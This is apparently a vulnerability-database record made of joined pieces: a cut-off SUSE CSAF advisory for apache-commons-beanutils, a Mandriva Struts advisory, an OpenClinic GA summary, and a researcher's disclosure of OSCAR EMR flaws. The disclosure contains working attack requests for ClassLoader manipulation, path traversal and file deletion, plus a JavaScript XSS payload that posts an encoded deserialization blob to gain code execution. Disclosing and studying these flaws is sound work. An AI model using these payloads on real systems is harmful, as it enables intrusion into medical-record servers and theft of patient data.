commons-logging from 1.1.1 to 1.2.\n * BEANUTILS-474: FluentPropertyBeanIntrospector does not use the\n \tsame naming algorithm as DefaultBeanIntrospector.\n * BEANUTILS-490: Update Java requirement from Java 5 to 6.\n * BEANUTILS-482: Update commons-collections from 3.2.1 to 3.2.2\n (CVE-2015-4852).\n * BEANUTILS-490: Update java requirement to Java 6.\n * BEANUTILS-492: IndexedPropertyDescriptor tests now pass on Java 8.\n * BEANUTILS-495: DateConverterTestBase fails on M/d/yy in Java 9.\n * BEANUTILS-496: testGetDescriptorInvalidBoolean fails on Java 9.\n - Historical list of changes:\n http://commons.apache.org/proper/commons-beanutils/changes-report.html\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-2056,SUSE-SLE-SERVER-12-SP5-LTSS-2025-2056,SUSE-SLE-SERVER-12-SP5-LTSS-EXTENDED-SECURITY-2025-2056",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_02056-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:02056-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-202502056-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:02056-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-June/040424.html"
},
{
"category": "self",
"summary": "SUSE Bug 1243793",
"url": "https://bugzilla.suse.com/1243793"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-0114 page",
"url": "https://www.suse.com/security/cve/CVE-2014-0114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2015-4852 page",
"url": "https://www.suse.com/security/cve/CVE-2015-4852/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-48734 page",
"url": "https://www.suse.com/security/cve/CVE-2025-48734/"
}
],
"title": "Security update for apache-commons-beanutils",
"tracking": {
"current_release_date": "2025-06-20T16:17:22Z",
"generator": {
"date": "2025-06-20T16:17:22Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:02056-1",
"initial_release_date": "2025-06-20T16:17:22Z",
"revision_history": [
{
"date": "2025-06-20T16:17:22Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "apache-commons-beanutils-1.11.0-7.3.1.noarch",
"product": {
"name": "apache-commons-beanutils-1.11.0-7.3.1.noarch",
"product_id": "apache-commons-beanutils-1.11.0-7.3.1.noarch"
}
},
{
"category": "product_version",
"name": "apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"product": {
"name": "apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"product_id": "apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:12:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss-extended-security:12:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-commons-beanutils-1.11.0-7.3.1.noarch as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch"
},
"product_reference": "apache-commons-beanutils-1.11.0-7.3.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
},
"product_reference": "apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-commons-beanutils-1.11.0-7.3.1.noarch as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch"
},
"product_reference": "apache-commons-beanutils-1.11.0-7.3.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
},
"product_reference": "apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2014-0114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-0114"
}
],
"notes": [
{
"category": "general",
"text": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-0114",
"url": "https://www.suse.com/security/cve/CVE-2014-0114"
},
{
"category": "external",
"summary": "SUSE Bug 778464 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/778464"
},
{
"category": "external",
"summary": "SUSE Bug 875455 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/875455"
},
{
"category": "external",
"summary": "SUSE Bug 885963 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/885963"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-06-20T16:17:22Z",
"details": "important"
}
],
"title": "CVE-2014-0114"
},
{
"cve": "CVE-2015-4852",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2015-4852"
}
],
"notes": [
{
"category": "general",
"text": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2015-4852",
"url": "https://www.suse.com/security/cve/CVE-2015-4852"
},
{
"category": "external",
"summary": "SUSE Bug 954102 for CVE-2015-4852",
"url": "https://bugzilla.suse.com/954102"
},
{
"category": "external",
"summary": "SUSE Bug 955853 for CVE-2015-4852",
"url": "https://bugzilla.suse.com/955853"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-06-20T16:17:22Z",
"details": "critical"
}
],
"title": "CVE-2015-4852"
},
{
"cve": "CVE-2025-48734",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-48734"
}
],
"notes": [
{
"category": "general",
"text": "Improper Access Control vulnerability in Apache Commons.\n\n\n\nA special BeanIntrospector class was added in version 1.9.2. This can be used to stop attackers from using the declared class property of Java enum objects to get access to the classloader. However this protection was not enabled by default. PropertyUtilsBean (and consequently BeanUtilsBean) now disallows declared class level property access by default.\n\n\n\n\n\nReleases 1.11.0 and 2.0.0-M2 address a potential security issue when accessing enum properties in an uncontrolled way. If an application using Commons BeanUtils passes property paths from an external source directly to the getProperty() method of PropertyUtilsBean, an attacker can access the enum\u0027s class loader via the \"declaredClass\" property available on all Java \"enum\" objects. Accessing the enum\u0027s \"declaredClass\" allows remote attackers to access the ClassLoader and execute arbitrary code. The same issue exists with PropertyUtilsBean.getNestedProperty().\nStarting in versions 1.11.0 and 2.0.0-M2 a special BeanIntrospector suppresses the \"declaredClass\" property. Note that this new BeanIntrospector is enabled by default, but you can disable it to regain the old behavior; see section 2.5 of the user\u0027s guide and the unit tests.\n\nThis issue affects Apache Commons BeanUtils 1.x before 1.11.0, and 2.x before 2.0.0-M2.Users of the artifact commons-beanutils:commons-beanutils\n\n 1.x are recommended to upgrade to version 1.11.0, which fixes the issue.\n\n\nUsers of the artifact org.apache.commons:commons-beanutils2\n\n 2.x are recommended to upgrade to version 2.0.0-M2, which fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-48734",
"url": "https://www.suse.com/security/cve/CVE-2025-48734"
},
{
"category": "external",
"summary": "SUSE Bug 1243793 for CVE-2025-48734",
"url": "https://bugzilla.suse.com/1243793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-06-20T16:17:22Z",
"details": "important"
}
],
"title": "CVE-2025-48734"
}
]
}
VAR-201404-0288
Vulnerability from variot - Updated: 2026-03-09 21:53Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485 Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484 Improper authentication (CWE-287) - CVE-2020-14494 Lack of certification (CWE-862) - CVE-2020-14491 Execution with unnecessary privileges (CWE-250) - CVE-2020-14493 Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488 Path traversal (CWE-22) - CVE-2020-14490 Inappropriate authorization process (CWE-285) - CVE-2020-14486 Cross-site scripting (CWE-79) - CVE-2020-14492 Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489 Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485 A remote attacker bypasses the system's account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484 In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494 The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491 In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493 The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488 Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490 By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486 Malicious code is executed on the user's browser because the user's input value is not properly validated. - CVE-2020-14492 Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489 A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.On a server where the product in running, a remote attacker may steal information or execute arbitrary code. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html
Updated Packages:
Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell
Product Description:
"OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System."
Timeline:
29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed
Contents:
This report uses OVE identifiers: http://www.openwall.com/ove/
OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery
Issue details:
=== OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency ===
OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114.
An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster
Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz
An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid
=== OVE-20160329-0003: Remote code execution via unsafe object deserialization ===
TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial.
In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well.
=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface ===
logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003:
var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData);
XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested)
=== OVE-20160329-0007: SQL injection ===
On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators.
=== OVE-20160329-0008: Path traversal ===
ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename).
Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz
An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp
=== OVE-20160329-0002: Insecure direct object reference in document manager ===
ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private.
=== OVE-20160329-0005: Denial of service via resource exhaustion ===
uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition).
=== OVE-20160329-0006: Insecure password storage ===
